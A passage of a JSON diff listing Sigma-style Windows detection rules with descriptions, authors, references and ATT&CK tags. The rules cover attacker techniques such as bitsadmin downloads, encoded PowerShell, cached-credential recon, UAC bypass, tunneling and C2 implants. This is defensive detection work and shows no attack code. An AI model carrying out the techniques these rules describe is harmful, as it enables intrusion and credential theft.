+ "value": "Automated Collection Command Prompt"
+ },
+ {
+ "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.",
+ "meta": {
+ "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard",
+ "creation_date": "2020/10/23",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
+ "https://www.cobaltstrike.com/help-opsec",
+ "https://twitter.com/CyberRaiju/status/1251492025678983169",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ]
+ },
+ "uuid": 
"a7c3d773-caef-227e-a7e7-c2f13c622329",
+ "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments"
+ },
+ {
+ "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets",
+ "meta": {
+ "author": "pH-T",
+ "creation_date": "2022/05/31",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.defense_evasion",
+ "attack.t1027"
+ ]
+ },
+ "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7",
+ "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets"
+ },
+ {
+ "description": "Detects base64 encoded listing Win32_Shadowcopy",
+ "meta": {
+ "author": "Christian Burkard",
+ "creation_date": "2022/03/01",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_base64_listing_shadowcopy.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.defense_evasion",
+ "attack.t1027"
+ ]
+ },
+ "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36",
+ "value": "Base64 Encoded Listing of Shadowcopy"
+ },
+ {
+ "description": "Detects base64 encoded .NET reflective loading of Assembly",
+ "meta": {
+ "author": "Christian Burkard, pH-T",
+ "creation_date": "2022/03/01",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": 
"proc_creation_win_base64_reflective_assembly_load.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.t1620"
+ ]
+ },
+ "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59",
+ "value": "Base64 Encoded Reflective Assembly Load"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file",
+ "meta": {
+ "author": "Michael Haag, FPT.EagleEye",
+ "creation_date": "2017/03/09",
+ "falsepositive": [
+ "Some legitimate apps use this, but limited."
+ ],
+ "filename": "proc_creation_win_bitsadmin_download.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede",
+ "value": "Bitsadmin Download"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file from a suspicious domain",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Some legitimate apps use this, but limited." 
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c",
+ "value": "Bitsadmin Download from Suspicious Domain"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file with a suspicious extension",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200",
+ "value": "Bitsadmin Download File with Suspicious Extension"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": 
"2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "99c840f2-2012-46fd-9141-c761987550ef",
+ "value": "Bitsadmin Download File from IP"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac",
+ "value": "Bitsadmin Download to Suspicious Target Folder"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file to uncommon target folder",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": 
"proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248",
+ "value": "Bitsadmin Download to Uncommon Target Folder"
+ },
+ {
+ "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.",
+ "meta": {
+ "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "creation_date": "2019/10/24",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_bootconf_mod.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1490"
+ ]
+ },
+ "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2",
+ "value": "Modification of Boot Configuration"
+ },
+ {
+ "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks",
+ "meta": {
+ "author": "pH-T, Nasreddine Bencherchali (update)",
+ "creation_date": "2022/07/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_browser_remote_debugging.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf",
+ "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1185"
+ ]
+ },
+ "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449",
+ "value": "Browser Started with Remote Debugging"
+ },
+ {
+ "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash",
+ "meta": {
+ "author": "Markus Neis, Florian Roth",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bypass_squiblytwo.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html",
+ "https://twitter.com/mattifestation/status/986280382042595328",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1047",
+ "attack.t1220",
+ "attack.execution",
+ "attack.t1059.005",
+ "attack.t1059.007"
+ ]
+ },
+ "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea",
+ "value": "SquiblyTwo Execution"
+ },
+ {
+ "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants",
+ "meta": {
+ "author": "Nasreddine Bencherchali, Florian Roth",
+ "creation_date": "2022/08/25",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ 
"filename": "proc_creation_win_c2_sliver.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
+ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "42333b2c-b425-441c-b70e-99404a17170f",
+ "value": "Sliver C2 Implant Activity Pattern"
+ },
+ {
+ "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.",
+ "meta": {
+ "author": "Alfie Champion (ajpc500)",
+ "creation_date": "2021/06/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_c3_load_by_rundll32.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ]
+ },
+ "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f",
+ "value": "F-Secure C3 Load by Rundll32"
+ },
+ {
+ "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/10/23",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_certoc_execution.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20",
+ 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2",
+ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "242301bc-f92f-4476-8718-78004a6efd9f",
+ "value": "Suspicious Load DLL via CertOC.exe"
+ },
+ {
+ "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_certutil_ntlm_coercion.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/LOLBAS-Project/LOLBAS/issues/243",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916",
+ "value": "NTLM Coercion Via Certutil.exe"
+ },
+ {
+ "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
+ "meta": {
+ "author": "Timur Zinniatullin, oscd.community",
+ "creation_date": "2019/10/21",
+ "falsepositive": [
+ "Admin activity"
+ ],
+ "filename": "proc_creation_win_change_default_file_association.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.001"
+ ]
+ },
+ "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061",
+ "value": "Change Default File Association"
+ },
+ {
+ "description": "Detects when a program changes the default file association of any extension to an executable",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_change_default_file_assoc_susp.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.001"
+ ]
+ },
+ "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89",
+ "value": "Change Default File Association To Executable"
+ },
+ {
+ "description": "Detects usage of the Chisel tunneling tool via the commandline arguments",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/09/13",
+ "falsepositive": [
+ "Some false positives may occure with other tools with similar 
commandlines" + ], + "filename": "proc_creation_win_chisel_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "value": "Chisel Tunneling Tool Usage" + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "meta": { + "author": "Aedan Russell, frack113 (sigma)", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chrome_load_extension.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ] + }, + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker" + }, + { + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use (Should be investigated either way)" + ], + "filename": "proc_creation_win_cleanwipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "value": "CleanWipe Usage" + }, + { + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_clip.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP" + }, + { + "description": "Detects usage of cmdkey to look for cached credentials", + "meta": { + "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_cmdkey_recon.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.005" + ] + }, + 
"uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "value": "Cmdkey Cached Credentials Recon" + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "proc_creation_win_cmd_delete.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File" + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/02/15", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline" + }, + { + "description": "Detect use of \"/R <\" to read and 
execute a file via cmd.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_read_contents.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", + "value": "Read and Execute a File Via Cmd.exe" + }, + { + "description": "Use \">\" to redicrect information in commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cmd_redirect.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/syntax-redirection.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "value": "Redirect Output in CommandLine" + }, + { + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate admin scripts" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "value": "Suspicious CMD Shell Redirect" + }, + { + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "meta": { + "author": "Nik Seetharaman, Christian Burkard", + "creation_date": "2019/07/31", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_com_object_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "value": "CMSTP UAC Bypass via COM Object Access" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation" + }, + { + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands" + }, + { + "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
